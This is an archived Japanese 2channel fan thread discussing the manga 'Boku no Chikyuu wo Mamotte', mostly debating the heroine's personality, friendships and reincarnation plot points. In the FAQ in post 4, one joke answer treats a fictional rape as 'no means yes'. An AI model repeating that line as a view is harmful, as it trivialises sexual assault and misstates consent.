2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ぼくの地球を守ってを守って&日渡作品すれ 14

1 :花と名無しさん:2006/08/17(木) 21:45:26 ID:???0
わたしたち、ここから・・・
 日渡作品をマターリ見守っていきましょう・・・

前世
ぼくの地球を守ってを守って&日渡作品すれ 13
http://comic6.2ch.net/test/read.cgi/gcomic/1147322510/

その他の過去スレや既出のループネタ等は>>2-10あたりへと転生

『別冊花とゆめ』 毎月26日発売
ぼく地球次世代ストーリー「ボクを包む月の光」連載中

別花ドットコム ttp://www.betsuhana.com/
白泉社公式 ttp://www.hakusensha.co.jp/top.shtml

2 :花と名無しさん:2006/08/17(木) 21:46:11 ID:???0
過去ログその1
ぼくの地球を守ってを守って&日渡作品すれ 12
http://comic6.2ch.net/test/read.cgi/gcomic/1140597853/
ぼくの地球を守って を守って&日渡すれ 11
http://comic6.2ch.net/test/read.cgi/gcomic/1129567620/
ぼくの地球を守ってを守って&日渡作品すれ 10
http://comic6.2ch.net/test/read.cgi/gcomic/1122593997/
ぼくの地球を守ってを守って&日渡作品すれ 9
http://comic6.2ch.net/test/read.cgi/gcomic/1117711191/
ぼくの地球を守ってを守って&日渡作品すれ 8
http://comic6.2ch.net/test/read.cgi/gcomic/1110156617/
ぼくの地球を守ってを守って&日渡作品すれ 7
http://comic6.2ch.net/test/read.cgi/gcomic/1098703461/
「ぼくの地球を守って」&日渡早紀作品スレ 6
http://comic6.2ch.net/test/read.cgi/gcomic/1094664471/
「ぼくの地球を守って」&日渡早紀作品スレ 5
http://comic6.2ch.net/test/read.cgi/gcomic/1092886161/
「ぼくの地球を守って」&日渡早紀作品スレ 4
http://comic6.2ch.net/test/read.cgi/rcomic/1071201600/
「ぼくの地球を守って」&日渡早紀作品スレ 3
http://comic.2ch.net/test/read.cgi/rcomic/1063586774/
「ぼくの地球を守って」2&日渡早紀作品スレ
http://comic.2ch.net/test/read.cgi/rcomic/1039846251/

3 :花と名無しさん:2006/08/17(木) 21:46:37 ID:???0
過去ログその2

『ぼくの地球を守って』。略して『ぼくたま』!
http://comic.2ch.net/test/read.cgi/rcomic/1013527101/
ぼくの地球をまもって
http://piza.2ch.net/gcomic/kako/960/960566824.html
「ぼく地球」の迅八はなんで人気がないの?
http://piza.2ch.net/log2/gcomic/kako/956/956085727.html
逝かないで、日渡先生!! #3
http://comic.2ch.net/test/read.cgi/gcomic/1007135020/
もうだめです!日渡先生!!#2
http://comic.2ch.net/test/read.cgi/gcomic/988778637/
もうだめです!日渡先生!!
http://salad.2ch.net/gcomic/kako/977/977080044.html

4 :既出ネタ: 1:2006/08/17(木) 21:47:16 ID:???0
さんざん既出のループネタその1

Q:紫苑と木蓮は何回ヤリましたか?
A:一発説と灰になるまで説があります。

Q:蓮は水子って本当ですか?
A:月基地から春と作者にのみ届いている
  強力電波の可能性が高いです。

Q:何故木蓮のキチェは消えなかったの?
A:知りません。サージャリムとビワタリ神のみ知る 思し召しです。

Q:あれはレイプ?和姦?
A1:夫婦間でも拒絶した事実があればレイプになるので、レイプでしょう。
ただ、木蓮が紫苑をかばう為にあれは合意だったと後から申告したので、
結果的に紫苑はお咎めナシになっただけ。
A2:簡潔に【イヤよイヤよも好きの内】

Q:アニメが中途半端でおわってしまうんですが・・・。
A1:仕様です。諦めましょう・・
A2:あなたの再生機は壊れていませんか?
  もう一度、植物がはびこっていないか
  お確かめの上、おかけ直し下さいw

5 :既出ネタ: 2:2006/08/17(木) 21:47:53 ID:???0
ループネタその2

Q:月基地の人間は小人サイズという設定ですが、地球の野菜やマンガが
そのままの大きさなのはなぜですか?
A:物の大きさをコントロールできるドラ○もんのような道具があるのです。

Q:じゃあなぜ月基地は地球人に発見されないのですか?
A:地球人がバ(ry

記憶鮮明シリーズの時間軸は
ぼく地球本編→2年後=偶然が残すもの(記憶鮮明2)
→さらに数年後=ぼく地球の最終話→現在進行中のボク月
(記憶鮮明文庫版あとがきによる)

EPIAがらみの話はみんな記憶鮮明シリーズです。
なお、実写化がらみのネタは荒れるもとなのでほどほどに。

6 :花と名無しさん:2006/08/17(木) 22:23:48 ID:???O
1乙

7 :花と名無しさん:2006/08/17(木) 23:22:41 ID:???0
>>1
乙です

最近全巻読み返してみた
夏になると不思議と読みたくなるわ…

8 :花と名無しさん:2006/08/18(金) 01:41:32 ID:???0
>1 お疲れ意様ですた

日渡さんの本、ぼく地球は最終巻げっととともに
売り飛ばしたけど、初期のだけは手放してない。

9 :花と名無しさん:2006/08/18(金) 03:15:21 ID:???0
【コミケ】キャラのコスプレで女児補導【コスプレ】
 “オタクの祭典”と呼ばれる同人誌即売会「コミックマーケット」(コミケ)が
11日、東京・有明の東京ビッグサイトで始まった。お気に入りのアニメのキャラクターの
衣装を楽しむ若者のなかに、殆ど衣装をまとわない姿で歩く女児に警備員が注意をしたところ、
それを無視して逃走したので、コススペース(コスプレが集まる場所)を出たところで
警察に取り押さえられた。女児曰く、殆ど裸なのがそのアニメのキャラクターなのだそうだ。

一瞬、モクレン少女の頃のコス?と思った・・・。

10 :花と名無しさん:2006/08/18(金) 15:54:58 ID:???0
俺、男なんだけど、男が観ても楽しめるの?
以前テレビで、このマンガの事(ファンがどうのこうの)を聞いて興味を持った。
少女マンガだと思ってなかったけど、とにかくタイトルを気に入って、時間があったら
YOU TUBEで観ようと思ってるんだけど感想を聞かせてくれ。
あと、「ファンがどうのこうの(熱狂的なファンの事かな?)」の詳細を知ってたら教えて。

11 :花と名無しさん:2006/08/18(金) 22:51:44 ID:???0
>10
楽しめるかどうかは個人差あり。

ようつべ
ttp://www.youtube.com/results?search_query=please+save+my+earth&search=Search

ファンがどうのこうの
ttp://d.hatena.ne.jp/keyword/%A4%DC%A4%AF%A4%CE%C3%CF%B5%E5%A4%F2%BC%E9%A4%C3%A4%C6
ttp://www.paradisearmy.com/PASOK7D.HTM

おまけ:大半の人の反応
ttp://www.google.co.jp/search?sourceid=navclient&hl=ja&ie=UTF-8&rls=GGLD,GGLD:2004-48,GGLD:ja&q=%E3%81%BC%E3%81%8F%E5%9C%B0%E7%90%83%E7%97%87%E5%80%99%E7%BE%A4

12 :花と名無しさん:2006/08/19(土) 14:17:02 ID:???0
>1乙です

久しぶりに本編読み返してみたんだけど、木蓮て友達が
できないとか悩んでたわりには、月メンバーと初対面の
時もまっさきに祈るのは男の事だし、皆で話してる間も
ずっと男の事ばかり考えてるし、それじゃキチェスで
なくても女友達なんかできないだろ・・・と思った。
大体の女はシュスランと同じように思うだろうな。
現世では、ありすと桜は肉体的には二人きりの女メンバー
なんだから、もっと相談したりとか絡んでもよさそうなのに、
そういうの全然なかったよね。あの二人にはすごく距離を感じる。

13 :花と名無しさん:2006/08/19(土) 16:12:37 ID:???0
>1乙です
>>12
木蓮が女友達よりも男との恋愛にこだわるのは、
「生涯の伴侶=自分のキチェスを消してくれる存在」だからだろうね。
しかし自分で「キチェスじゃなかったらモテなかったと思う」と言ってるように、
結ばれてキチェスじゃなくなった自分を変わらず愛してくれるのかの心配も同時にあった。
それ以前に、そんなリスクを冒してまでキチェスと一緒になりたいという男性自体、稀な存在だろうし。

その変わり者の条件に当てはまったのが紫苑だったのだけどねえ。
結局「キチェスでなくてもモテるのか?」という木蓮の懸念は、
ありすに転生した事によって解消されたのだろうか?
とりあえず輪も迅八も春も前世が木蓮かどうかは重要っぽいけど、
キチェスかどうかはどうでもいい気はする。

14 :花と名無しさん:2006/08/19(土) 19:08:06 ID:???0
>>1
乙です。
>>12
蓮を身ごもった時も桜に相談してもよさそうなのに。
と言うよりも、せっかく転校先には優しくしてくれる子達がいたのに
女の子達と仲良くしなさすぎだよ。

15 :花と名無しさん:2006/08/19(土) 21:27:58 ID:???0
まりちゃんに対しても、
「私トロいからついてけないの」みたいにうじうじしてたしなぁ。>修学旅行のとき
子供の頃も友達と仲違いしてたし。で、「嫌われちゃうの。どうしてかなぁ」

「優柔不断な割に協調性・柔軟性がないからだよ」と思った。
その点、木蓮もありすも同じに見える。
木蓮は虚勢を張ることで自分を守り、
ありすは卑屈になることで自分を守った。

特に反感は抱かなかったけど、
実際こういう人がいたら、友人にはなりたくない。

16 :花と名無しさん:2006/08/19(土) 23:51:52 ID:???0
木蓮は、男相手ならキチェや美貌によって冷たくされる
ことはないって無意識にでもわかってるから、結局は男に
頼るよね。女には嫌われるって決め付けて、自分から壁を
作ってる。エンジュとシュスランがいくら元々親友だった
からって、もっと打ち解けようと努力すれば、少なくとも
エンジュとはもっと仲良くなれたはず。
レイープ事件の時だって、もっと女子に頼ればよかったのに。
ありすになってもその辺は変わってないんだなと思った。
あれだけ色々あったのに桜には相談もせず、ほとんど
男子としか絡んでないよね。
続編になっても、桜と奥様友達してるようには見えないしなぁ。

17 :花と名無しさん:2006/08/20(日) 00:02:23 ID:???0
>>13
本当にキチェスじゃなくなっちゃったら、
キチェスだから友達できないだの、キチェス
でない自分を愛してくれる男がいないだの、
諸々の言い訳ができなくなっちゃうのにね。
確かにキチェスは特別視されて大変だろうけど、
木蓮は自分の性格を棚に上げて何でもキチェや
自分の生い立ちやらのせいにしすぎで同情できない。

18 :花と名無しさん:2006/08/20(日) 01:36:58 ID:???O
言い訳クサイところや卑屈なところも逆に人間臭くて、わたしは素直に受け入れられたなぁ。
ありすみたいなタイプは桜タイプとは深く付き合いしないだろうと、大人になった今は思う。
努力家で前向きなヒロインじゃなくてもいいし、変に仲良しこよしで大団円過ぎなくてもいいかな。
もちろん前向きなのが読んでて気持ちいいけれど。

19 :花と名無しさん:2006/08/20(日) 03:28:14 ID:???O
「どうしてかなぁ」「どうしてなの…?」
と悲しむだけで、そのじつ
他者の気持ちに対する配慮、想像力が足りない。
自分を哀れむ涙しか流さない。

一成の悲恋に付き合って一緒に涙する桜とは違うのよね。

20 :花と名無しさん:2006/08/20(日) 14:01:29 ID:???0
モクレンはあの容姿と頭脳ままで普通の人間だったら、
「なんであんな冴えない人がキチェスってだけでもてはやされるの」
とかムッとしそうな気がする。

もしくは「私もキチェスになりたい!そして人々を救うの!」とトンチンカンな事を願うか。

21 :花と名無しさん:2006/08/20(日) 14:11:56 ID:???0
>>19
あ、わかるかも。対応が柔らかいから優しそうに見えるってだけで、別に優しくないな。
木蓮時代を含めて、自分は悩みを相談しても、されたことはなさそうだから
人の気持ちを思いやるってことを知らないのかもしれん。こういう人、同性としては嫌かも。
母になった今も、蓮のことを理解しようと思ってる風に見えないので
僕月のありすは好きになれない。放任で甘いから目立たないけど、頼りにならない親っぽい。

22 :花と名無しさん:2006/08/20(日) 15:33:34 ID:???0
木蓮の髪型のありす見てみたい。
男性陣(一成除く)は萌えるだろうか。


似合わないと思うけど。

23 :花と名無しさん:2006/08/20(日) 23:30:50 ID:???0
蓮はEPIA的にどれくらいの能力者として認められるんだろう?
テレポートはできるよね、あとサイコメトリ。

あと未来露は地球産エスパーとしては最強なのかな。


24 :10:2006/08/21(月) 00:14:48 ID:???0
>>11
超アリガd
なるほど、自分も少し調べてみたけど、前世ブームとかが起こったのね。
思い込んじゃったり、何かに自分を重ねたりするのは、女性らしいといえば女性らしい。
しかし、作者は自分の作品がそうしたブームの一端を担っている事に対してどう考えてたんだろうね。

それにしても、このスレって年齢層高い?80年代から連載が始まったんでしょ。
これから観て、終わったらここに感想を書くかもしれない、解からない事もあるかもしれないし。


25 :花と名無しさん:2006/08/21(月) 01:04:42 ID:???0
>>24
>作者は自分の作品がそうしたブームの一端を担っている事に対してどう考えてたんだろうね。

「これは日渡が作ったフィクションです!」と、コミクス内で「作り話」宣言をなされました。

26 :花と名無しさん:2006/08/21(月) 19:26:10 ID:???0
>>22
男性人が(桜もか?)萎えるよ>木蓮の髪型の亜梨子

>>17
木蓮は結局自分の境遇に甘えているんだよね。
木蓮の二番煎じ(アクマ君のチャチャがいるから3番煎じか?)キャラと言われている
うてなの氷樹とその点で対照的だな。


27 :花と名無しさん:2006/08/22(火) 17:56:18 ID:???0
チャチャには好感が持てるけど木蓮には持てない。
というよりもアンチ寄り・・・
この差はなんなんだろう。

28 :花と名無しさん:2006/08/22(火) 19:41:24 ID:???0
連載当時はそれほどではなかったけど、最近アクマくんの面白さに
開眼した。もし日渡の絵柄があの当時に戻るなら、
続編が読みたい.......ま、無理だとわかってるがな(´・ω・`)

29 :花と名無しさん:2006/08/22(火) 20:58:50 ID:???0
>>27
答.本人達の性格の違い。
チャチャ及び氷樹に対し、木蓮には「表面だけの良い子ちゃん」という感が否めない。

30 :花と名無しさん:2006/08/23(水) 05:20:25 ID:???O
>>24
女性らしいの意味がわからん

31 :花と名無しさん:2006/08/24(木) 23:31:14 ID:???0
>>23
EPIAの超能力者達が超能力をどのくらい使えるかによるな。
蓮はわりかしイイ線いってそうだけどね。
その前に両親の亜梨子と輪に目を付けないかな。

それはそうと、未玖路達は給料をもらっているのかな。
もらっているとしたらどれくらいの金額かな。

32 :花と名無しさん:2006/08/25(金) 04:20:50 ID:???0
ところでサントラいいよなー…1個目のほう、好き。
2個目は先輩のウチで聴かせてもらったらネタっぽすぎてしょぼーんとなってしまったが;

>>1さん乙です☆

33 :花と名無しさん:2006/08/25(金) 11:20:59 ID:???0
やっと全巻揃えられた。
地元の本屋はいつも2、3冊だけ置いてなくて
色々と本屋を探した結果、揃えるのに二ヶ月近くかかったw

気になったんだけど、迅八がアリスにキスしちゃったと
集会で暴露してしまった時に一成がブチきれてたり、
迅八が「坂口さんがイイなら前世の記憶なんて覚醒しなくていい」と
言って一成がゲンコツかましてキレてたのって、まさか
まだエンジュとしての恋心があるからって事?
桜と河川敷で相談しあって、「エンジュの恋心はどこへいくんだろう」と
言ってたから、てっきり完全に吹っ切れたのかと思ってた。

確かにコミックスの人物紹介で最後まで一成の紹介が「親友に惚れてしまった変態であーる」のままだったがw

34 :花と名無しさん:2006/08/25(金) 11:43:45 ID:???0
>>33
ちょっとだけムッとするというか、スネてるだけなんじゃない?
別に未練があるとか吹っ切れてないわけじゃないと思う。
別れても友達してた元彼に次の彼女ができた(そして自分には
まだ次の彼氏はいない)時の気分みたいな。

35 :花と名無しさん:2006/08/25(金) 17:16:19 ID:???0
幼少期のありすが海賊ごっこで女友達に嫌われるエピさ、
あれってどうやっても結局あの友達には嫌われてたんじゃないか?
女の子、最初から仏頂面だったし、お姫様役かわってもらって
ありすの後ろにいた時は赤くなってまんざらでもない顔してたくせに、
ただの逆ギレじゃん。ありすがお姫様やってても結局はふてくされて、
嫌いって言われてたと思う。まぁありすの意見に聞く耳ももたずに、
あからさまに白けた態度した空気読めない男子が元凶だとは思うけど。
(子供が空気読めなかったり自己中なのは仕方ないけど。)ありすは
あまり好きじゃないけど、あの状況で丸く収めるのは誰でも難しいよ。

36 :花と名無しさん:2006/08/25(金) 20:19:28 ID:???0
>>35
まあ、女の子があの男の子を好きなのも、その子はありすが好きなのも紛れもない事実な上に、
人の気持ちだからどうする事も出来ないからね。
ただ、ありすの方は恋愛感情は全くなかったみたいだから、とんだとばっちり。

一番いいのはあの女の子が、
「女を上辺だけで判断してありすちゃんを好きになるあいつなんか知らない」
と強がって気持ちを冷めさせるか、それでも諦めきれないなら告白するか。
男の子の方だって望みがないのは薄々気づいてたろうから、
他の子にいきなり告白されれば何か変わったかもしれない。
それでもあいつはダメだとなれば、女の子の方も諦めが付くか冷めるだろうし。

ただ、年齢的にそれは難しいだろうね。
やっぱりありすにはどうにも出来ない気が。
男の子にあからさまに冷たい態度取るのも友達として角が立つし、
そんな事されてもやっぱり女の子は面白くないだろうし。

37 :花と名無しさん:2006/08/25(金) 21:04:06 ID:???0
木蓮って自分が異性にモテて同性に嫌われるのはキチェと美貌のせいだと思ってた割には、
ありすレベルのルックスに転生してるんだよね。
女性の感覚で「この程度ならモテないだろう」って予想が外れたのか、
基本的に面食いだから不細工に転生するのは嫌でその許容範囲がありすなのか、
それなりに美人なのに同性にも好かれるエンジュに憧れて似た雰囲気の外見になったのか。

38 :花と名無しさん:2006/08/25(金) 21:29:40 ID:???0
ありすって最初は地味なタイプだったのに、話が進むにつれて
クラスのアイドル的存在の女子になったよな

木蓮的には外見で嫌われたくないから地味目な女の子になりたいと
願ったんだろうけど、前世が絶世の美女だったから転生した姿でも
地味とはいえ綺麗系になったのでは?
皆、何にせよ前世の顔の造詣が現世に出てるからなぁ
(シュウカイドウと紫苑は顔が逆になってたが、顔の表情(?)では前世のまま)

39 :花と名無しさん:2006/08/25(金) 21:36:47 ID:???0
http://www.kiokunotoge.jp/
これ見てビビッと来てこのスレに来てしまったのはオレだけでいい。

40 :花と名無しさん:2006/08/25(金) 21:59:13 ID:???0
美人が嫌だったのに顔合わせの時は美人フェロモン出しまくりで、
柊を変な顔ガッカリとか玉と紫苑を顔で選んだメンクイぷりはなんか嫌だ。

41 :花と名無しさん:2006/08/25(金) 22:43:46 ID:???0
もし亜梨子の高校が普通校ではなく音大付属だったら、
転校当初「何だか地味で冴えない子ね」
話が進むにつれて「あの子最近調子に乗っているわ」と言われて
木蓮の二の舞になっていたんじゃないかな。

42 :花と名無しさん:2006/08/26(土) 01:23:53 ID:???0
>>35-36
子供にもできる、子供らしい方法があるよ。
「じゃ、私海賊ごっこやめた!○○ちゃん、帰ろ!」って言えばいい。
自分が我が儘になって、あの男の子に嫌われればいいわけだ。
どう?



43 :花と名無しさん:2006/08/26(土) 01:41:24 ID:???O
木蓮→白人顔→地味顔→東洋人→亜梨子=美人じゃない
くらいの認識ではないか?
でも、月基地の人間が日本に集まった理由はわかんね。
輪は無意識に木蓮を追い掛けてきたから、で強引に説明できるかもだけど。
全員が木蓮を追い掛けてきたんならイヤだなぁ。

44 :花と名無しさん:2006/08/26(土) 03:59:58 ID:???0
木蓮て東洋系っぽい。
象牙色の肌って黄色人種の肌の褒める時の表現で見るし。
西洋人だと陶器とかミルクとか?

45 :花と名無しさん:2006/08/26(土) 04:43:28 ID:???0
あ、あれ?

今月の別花のぼく月の話題がない?

46 :花と名無しさん:2006/08/26(土) 07:12:18 ID:???0
>>42
ああ、その手があったね。
でもあの話って男の子と女の子が子供っぽくて(子供だけど)ワガママって設定みたいだから、
何してもうまく行かないような気も。

・ありすは基本的に気が弱いので、勝手に配役変えるのがせいいっぱいで、
海賊ごっこ自体を辞めたり他の遊びを提案して受け入れさせるのは難しいのでは?
「ありすを姫様役にして海賊ごっこ」は男の子全員の意見っぽいし。

・男の子がありすを好きなのっておそらく外見だろうから、その程度のワガママで嫌ってくれるかどうか。
それに女の子も一緒に帰らせてしまうと「もっと男の子と遊びたかったのに…」と逆恨みされそうだし、
かと言って一人置いていくと男の子達の冷たい視線に晒され、結局その子はありすを嫌う気も。

結論
ありすは友達を選ぼう

47 :花と名無しさん:2006/08/26(土) 07:18:01 ID:???0
>>43
なぜ全員が日本に転生?の件は前にも話題になってたけど、
 木蓮が日本びいき→男性陣は全員木蓮を追う→エンジュは玉を追う→
 シュスランはエンジュが心配なので仕方なく追う
でいいのでは?

どちらかというと、全員が東京近郊に転生したり親の転勤などで結果的に集まった方が不思議。
輪って紫苑の時から東京タワーマンセーで、それを他のメンバーも知ってたりした?
実はあの7人ってかなり仲が良いんじゃw

48 :花と名無しさん:2006/08/26(土) 08:10:52 ID:???0
海賊話でありすが「嫌われちゃうの。どうしてかなぁ」の時、
母親は何と言ってあげたのだろう?
ありすのあの雰囲気なら詳しい事情も聞けただろうし。
「こっちは良かれと思ってした事でも、却って相手を傷つける事もあるんだよ」とか、
「じゃあありすがその子の立場だったら、同じ事されて嬉しい?」とか言ってあげてれば、
ありすももう少しその後の人間関係を上手く築けたと思うのだけど。

「ここが踏ん張りどころなんだよ」みたいに、
「人生辛い事も多いのだから、とにかく耐えて頑張るしかない」
系の事しか言ってあげなかったのだろうか?

49 :花と名無しさん:2006/08/26(土) 08:50:46 ID:???0
そういや木蓮ってエンジュの気持ちを知ってたはずだけど、
それを気遣う描写ってあったっけ?
変な気を遣うのはエンジュを傷つけるだけだし、
木蓮が玉蘭だけを本気で好きならむしろ遠慮する必要なんてないだろうけど、
「紫苑とどっちにしようかしら」なんて態度を取ってたら、
そりゃエンジュだって単なる嫉妬だけでなく頭に来て木蓮を嫌うだろう。
玉蘭がバカにされてるようなものだし。

そういう自分の非を認めず、「嫌われてるのなんて慣れてる」と被害者意識になってしまう辺り、
やはり木蓮って人の気持ちを考える事が出来ない人なんだろうな。

50 :花と名無しさん:2006/08/26(土) 12:09:46 ID:???0
>>49
直接エンジュに気遣うような描写はなかったはずだけど、
(女子だけと絡むシーンって数えるほどしかなかったし)
酔っ払って玉に「エンジュの気持ちに応えてあげたら?」
みたいな事を言ってたことはあったね。
「彼女にはもう優しくしたからいいんだよ」ってあっさり
スルーされてたけど。
玉はそんなこと言われてもお構いなしに木蓮への告白に
もってっちゃうような聞く耳もたない男だし、玉に言っても
無駄ってかよけいに悪い結果になっちゃてたけどね。

51 :花と名無しさん:2006/08/26(土) 13:48:46 ID:???0
あんたなんか嫌い。とガツンと言わないとわからないだろな。
遠まわしに言っても自分の都合のいいようにしか解釈しないっぽいしw
なんでいつどこでどうなって「木蓮は玉を愛してるだの好きだの」になってたんだか。

52 :花と名無しさん:2006/08/26(土) 14:25:45 ID:???0
>>43>>47
私は日渡さんが「外国だと資料集めや取材が大変で面倒だから
全員日本に転生させよう。いっその事東京なら楽だし」という事で
東京近郊に集めたんじゃないか、と思っていたよ。
そういえば女の子3人が一緒にテレビを見ていた場面もあったな。

未来のうてなを描いていた時からして「海外旅行の経験もパスポートもない私が
取材の為に成田空港まで行ったんですよ」と言っていたくらいだもん。
せめて「成田空港」が「イギリス」だったらもっと感心できたけど。


53 :花と名無しさん:2006/08/26(土) 15:55:43 ID:???0
でも玉はいい奴だよな。小物っぽいけど。
迅八も話が進むにつれて嫌な役回りが多かったけど、
最初はアリスが孤立しないよう庇ってあげたり、気を回したりと
かなりイイ奴だと思った。途中からはウジウジと紫苑への
恨み言を言って、そのたびに元エンジュの一成に怒られるという
情けの無い姿が目立ったけどねw

54 :花と名無しさん:2006/08/26(土) 16:15:55 ID:???0
>>51
木蓮と紫苑にはテレパス能力もあったみたいだけど、玉には全くなかったのだろうか?
もし多少でもあったのだとしたら、レイープ後の紫苑の
「違う。あんたは玉を愛している」の部分だけ都合良く受け取ったのかもw
お互いへの思いが強い方がテレパスも強く働くみたいだし。

>>52
ああ、だからうてなでイギリスのシーンがほとんどなかったのか。納得。

55 :花と名無しさん:2006/08/26(土) 17:07:46 ID:???0
ここまで読んで、
あの海賊ごっこの男の子−女の子−ありすの関係って、
玉−エンジュ−木蓮の関係と相似形になってることに気づいた。

ああいう関係をうまく捌けないのは、転生しても変わらないんだね。


56 :花と名無しさん:2006/08/26(土) 18:03:09 ID:???0
木蓮の失敗は人の気持ちを理解するのが一番難しいと分かってたくせに、
心理学を専攻しようという発想がなかった所かな。
あまり人間が好きでないから、意図的に学ぼうとしなかったのもあるかもしれないけど。
まあ学んだからって人間関係がうまく行くかというとそんな単純なものでもないだろうが、
少なくともどうして自分が嫌われやすいのかは分かったのでは。

おそらく日渡さんもその辺は意図的に描いてたのかもね。
人間関係を上手く築けない紫苑と木蓮が惹かれあう。
輪も覚醒前から友達が少なかったと母親が言ってたし。

57 :花と名無しさん:2006/08/26(土) 19:51:23 ID:???0
木蓮は両親からしてああだったからなー
覚悟してキチェを捨てたと言いつつも
結局キチェによる恩恵に依存してしか生きられず、
自分たちの悲劇に浸って現実が見えてなかった夫婦。
よく見ると木蓮と似てるよ。

58 :花と名無しさん:2006/08/26(土) 20:04:05 ID:???0
>>57
木蓮母は木蓮父をからかいまくったりして気が強そうだったのに、
夫が死んだ途端自分一人じゃ無理だとあっさり木蓮を手放し、
自分も死んでしまったのが根性ないなと思った。
小さい頃から楽園でキチェスとしての教育しか受けて来てないのだから、
普通に働いて生活するのは大変な苦労だとは思うけど、
そこまでの覚悟がないのに結婚して子供作るのはどうかと。
男のキチェスが短命なのは昔から知ってただろうし。

そういや元キチェスって全国民レベルでメンが割れてるのかな?
キチェを捨てた過去まで全て知られてたら、
どこも雇ってくれるどころか部屋すら貸してくれないよね。
他の元キチェスがどういう人生を辿ったのか、
全キチェスの何パーセント位だったのかは描写されてなかったと思うけど。

59 :花と名無しさん:2006/08/27(日) 00:11:59 ID:???0
木蓮クラスなら国の大切な行事に度々出席していて恐らくマスコミに
登場する機会も多かっただろうから全国レベルの有名人だけど、
普通のキチェスもやっぱり国を上げて保護されている対象だから
産まれた時からちゃんと役所にキチェスだと登録されて、
キチェスを失ったときもやっぱり記録に残されるんじゃないかな。
元キチェスがどんな人生を送ったか、キチェス達に話して戒めるエピも
あってもおかしくなかったけどね。

まあ木蓮両親は報奨金を受け取っていたから生活できたんだろうけど。
そういった面はやっぱり、小さい頃から世間から隔絶された楽園で育てられ
(言うなれば温室育ちのお坊ちゃまお嬢様)物事の考え方が甘くなってしまったから
じゃないかな。

>>39
亀レスだけど、この映画のカップル(?)は年齢差からすると、うてなの貴優と麒麟に近いな



60 :花と名無しさん:2006/08/27(日) 08:24:11 ID:???0
>>47
「エンジュは玉を追う」のは同意だけど
「シュスランはエンジュが心配なので仕方なく追う」は
シュスランが先に死んでたからちょっと違うと思う

61 :花と名無しさん:2006/08/27(日) 08:49:26 ID:???0
>>60
追うと言っても本人の中では予想の段階ね。
「○○は〜の理由で日本に転生するだろうから、自分もそうして待ってよう」とか。
それ言ったら紫苑以外の男メンバーも木蓮より先に死んでるし。

>>59
>元キチェスがどんな人生を送ったか、キチェス達に話して戒めるエピ
それは思った。でもいくら3歳までとはいえ、両親がどれだけ苦労したのかを
一番身近にいて多少記憶も残ってた木蓮がそういう苦労を何も考えずに
「恋愛してキチェ捨てたい」と気楽に言ってたからなあ。
周囲が詳しく教えなかったのかもしれない。
政府や楽園側にしてみたらキチェは一生キチェとして生きていって欲しいだろうけど、
キチェを捨てたいと言う発想自体が背徳的なものだろうから、
その時点で不適格とみなされて見捨てられてしまうのかも。
犯罪と一緒で実行さえ(しようと)しなければ特に罰則はないのだろうけど。

紫苑との事件は母星消滅後だったから確認しようがないけど、
もしそうでなかったら楽園は木蓮を「レイープされたけどキチェが消えなかったキチェス」として、
今まで通り受け入れてくれたのだろうか?
もちろん月基地のメンバーは必死に隠蔽するだろうけど、木蓮自身が話してしまいそう。

62 :花と名無しさん:2006/08/27(日) 10:11:07 ID:???0
今月号の話題がない

63 :花と名無しさん:2006/08/27(日) 10:46:18 ID:???0
今月号の話題・・・

なぜ日渡さんは「もう」を「もぉ」と書くのを
続けるんだろう

64 :花と名無しさん:2006/08/27(日) 14:50:44 ID:???0
川原泉さんの「レナード現象には理由がある」の
「マユがぁ」を思い出してしまったよ・・・

>>54
同じく川原ネタだけど「笑う大天使/オペラ座の怪人」でイギリスのシーンを
たくさん出していたけど、「元々出不精だからその時も取材旅行なんて
行かなかった」と言っていたな。


65 :花と名無しさん:2006/08/27(日) 18:35:06 ID:???0
ここでも川原泉の名前を見るとはw

>イギリスのシーン
普段の読書量・・・イギリスに対してのイメージを
当時どのくらい持てていたかの差ではないかと思ったり思わなかったり。

66 :花と名無しさん:2006/08/27(日) 19:06:00 ID:???0
なんで、輪は晴彦がシュウだとわかったんですか?

67 :花と名無しさん:2006/08/27(日) 19:45:26 ID:???0
ESP



68 :花と名無しさん:2006/08/27(日) 20:18:23 ID:???0
なるほど

69 :花と名無しさん:2006/08/27(日) 20:50:12 ID:???0
>>67
その理屈だと、ESPがあるのに輪=紫苑だと気づかなかった
ありすと迅八と一成は相当鈍いことにw

マジレスすると、
・月基地メンバーの中で行方知れずなのは秋だけ
・輪(紫苑)は秋に特別恨みを抱いていたから、覚醒後は意識して探してた
・紫苑そっくりな春を見て確信
みたいな感じでは。

逆に春が輪を見てすぐ紫苑だと分かり、
おびえた態度を取った方が勘が鋭いなと思った。

70 :花と名無しさん:2006/08/27(日) 20:53:40 ID:???0
今月号かぁ・・・
なんつーか何とも言えん展開だしなー・・・


71 :花と名無しさん:2006/08/27(日) 21:18:04 ID:???0
いまだに謎なんだけど、なんで木蓮の両親は楽園で木蓮を
生んだの?禁を犯した時点で追い出されそうなもんなのに。
元キチェスで一般社会では生きられないだろうから、
出産までは仕方ないからいていいよ、って事だったのかな?
でも、やっちゃって(キチェ消えて)から妊娠発覚するまで
の間になぜ追い出されなかったのだろうか・・・。
どうも木蓮の両親絡みのエピは矛盾点が多い気がして、
木蓮=楽園生まれの祝福されたサラブレッドっていう
イメージの為だけに無理やりつけられた肩書きにしか思えない。

72 :花と名無しさん:2006/08/27(日) 21:42:50 ID:???0
>>69
なるほど


73 :花と名無しさん:2006/08/27(日) 21:43:15 ID:???0
後々木蓮の憧憬となる、キチェの犠牲になった
哀れなカップルとして描かれてたんだろうけどね>両親
後付のせいか色々無理があった。

74 :花と名無しさん:2006/08/27(日) 21:43:45 ID:???O
輪が、春彦が秋だって気付いたのって、デパートの学生服売場で輪と春がぶつかったときに、ESPで読んだのかと思ったんだけど?今手元に本無いから曖昧だけど。
もっと前から知ってたっけ?

75 :花と名無しさん:2006/08/27(日) 22:34:58 ID:???0
>>67>>74だよね?
本当に>>74の通りだったら、ネタ扱いしてスマンかった>67
もしかして輪ってテレパス能力も一成以上?

76 :花と名無しさん:2006/08/27(日) 22:39:27 ID:???0
木蓮の性格についてだけど…
キチェは、ただでさえ施設に隔離されて、家族と離れて暮らして特別に育つのに
木蓮の場合は、また更に特別だったじゃない!?
両親の事で、異端児あつかいされてたし…キチェの素質(資質)もあったから
やっかみもあっただろうし。
モードだけが、心を開ける相手だったけど侍女だったし…
(モードも侍女仲間の間では、異質な目で見られてたっぽいよね!?)
やっぱ、普通の友達や人間関係を築いたり、育む事は出来なかったんじゃないかな?
